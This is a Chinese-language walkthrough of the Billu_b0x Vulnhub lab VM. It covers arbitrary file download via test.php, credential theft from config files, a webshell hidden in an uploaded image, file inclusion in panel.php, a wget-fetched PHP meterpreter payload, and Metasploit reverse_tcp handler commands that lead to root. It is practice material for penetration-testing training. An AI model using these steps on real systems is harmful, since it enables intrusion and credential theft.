Billu_b0x靶机渗透

环境

• 靶机(Ubuntu):192.168.40.140
• 攻击机(Kali Linux):192.168.40.129

下载地址

• https://www.vulnhub.com/entry/billu-b0x,188/

渗透过程

按照惯例先nmap扫描网段，得到靶机IP为 192.168.40.140

得到IP后，访问网页，发现只有登录框，没有什么意外的东西，扫描一下后台目录，看看有没有什么文件可利用的，扫描完后，发现有一堆php，同时还有一个phpmy(phpmyadmin)的网页

都访问了一遍后，发现test.php需要传入一个file的参数，用 GET型的方式试了一下，发现不行

换火狐浏览器，开hackbar，发送 POST数据

发现可以任意文件下载，把所有文件都下载下来后，发现 c.php文件里面有数据库密码，是用来访问phpmyamdin的(至于为什么不是index.php的登录用户，试一试能不能登录就知道了，要是能登录我也懒得去phpmyadmin)

登录phpmyadmin后，在 ica_lab.auth表中找到另外一个用户名密码

拿上面那个账号密码成功登录

在登录后的界面找到了上传点

看路径得到php文件名为 panel.php，回到火狐浏览器下载源码，代码乱审计了一波，发现 panel.php中有文件包含的漏洞，接下来的操作用人话说就是，通过文件包含把php语句包含到panel.php中，然后执行命令

上传一张正常的图片，然后通过burpsuite在图片中插入一句话木马（也可以外面修改完后上传）

完事后，在 panel.php页面中点击continue生成流量包，通过改 load这个参数的内容来把我 Elapse.jpg文件中的php语句包含进去

这样panel.php就相当于是一个木马文件了，给它一个elapse的参数执行命令试一下

成功执行，那么为了方便我这里多余一步，将 uploaded_images下的Elapse.jpg改为 Elapse.php，这样方便点，因为burpsuite中，需要手动url编码，也就是空格需要写成%20，太麻烦辽

更改完后，就可以直接去uploaded_images目录下利用Elapse.php了，这个时候就得想个法子来反弹shell了，那么就又到了我就喜欢了生成Php木马的时间了

生成完后，还需要改个后缀，因为是Php的话，会直接执行了，这样一来对方在wget尝试下载的时候就会下载不到本体，所以需要改为 .txt或者其他格式，改完后开起apache2就好了

回到靶机这边，用wget将php木马下载下来

下载成功后，改个后缀为php

改完后，去到kali里面，用handler模块来触发payload

root@Elapse:/var/www/html# msfconsole 
msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.40.129
lhost => 192.168.40.129
msf exploit(multi/handler) > set lport 4123
lport => 4123
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.40.129:4123

完事后，在浏览器这边输入链接触发木马

触发成功辽，tql

输入 shell进入系统，输入 python-c'import pty; pty.spawn("/bin/bash")'来转到终端

然后在系统里面一顿找文件的操作，才想起来，phpmy路径下会有一个config.inc.php，回过头来访问一下，就很简单的找到了root密码

尝试性的su root后，不小心就变成root用户了

总结

比起之前下载的（没写出来）的靶机，这个简直太正常了，思路都给那些辣鸡靶机打乱了，本来进到系统直接找config.inc.php就好了，完了一堆乱七八糟的find grep的操作，是真的傻